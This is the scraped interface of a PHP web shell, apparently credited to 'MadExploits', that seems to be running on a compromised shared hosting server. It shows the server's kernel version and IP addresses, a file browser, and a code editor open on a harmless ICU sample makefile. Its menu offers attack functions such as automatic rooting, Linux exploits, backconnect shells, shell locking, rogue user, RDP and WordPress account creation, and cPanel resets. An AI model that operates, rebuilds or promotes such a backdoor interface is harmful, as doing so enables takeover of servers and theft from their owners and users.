Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.147.74.197
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
libicu /
usr /
share /
doc /
alt-libicu-devel /
samples /
ufortune /
resources /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
1.93
KB
-rw-r--r--
es.txt
16.16
KB
-rw-r--r--
fortune_resources.mak
1.46
KB
-rw-r--r--
res-file-list.txt
16
B
-rw-r--r--
root.txt
7.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fortune_resources.mak
# Copyright (C) 2016 and later: Unicode, Inc. and others. # License & terms of use: http://www.unicode.org/copyright.html#License # # Copyright (c) 2001-2009 IBM, Inc. and others # # fortune_resources.mak # # Windows nmake makefile for compiling and packaging the resources # for the ICU sample program "ufortune". # # This makefile is normally invoked by the pre-link step in the # MSVC project file for ufortune # # List of resource files to be built. # When adding a resource source (.txt) file for a new locale, the corresponding # .res file must be added to this list, AND to the file res-file-list.txt # RESFILES= root.res es.res # # ICUDIR the location of ICU, used to locate the tools for # compiling and packaging resources. # ICUDIR=..\..\..\.. # # The directory that contains the tools. # !IF "$(CFG)" == "x64\Release" || "$(CFG)" == "x64\Debug" BIN=bin64 !ELSE BIN=bin !ENDIF # # File name extensions for inference rule matching. # clear out the built-in ones (for .c and the like), and add # the definition for .txt to .res. # .SUFFIXES : .txt # # Inference rule, for compiling a .txt file into a .res file. # -t fools make into thinking there are files such as es.res, etc # .txt.res: $(ICUDIR)\$(BIN)\genrb -d . $*.txt # # all - nmake starts here by default # all: fortune_resources.dll fortune_resources.dll: $(RESFILES) $(ICUDIR)\$(BIN)\pkgdata --name fortune_resources -v --mode dll -d . res-file-list.txt
Close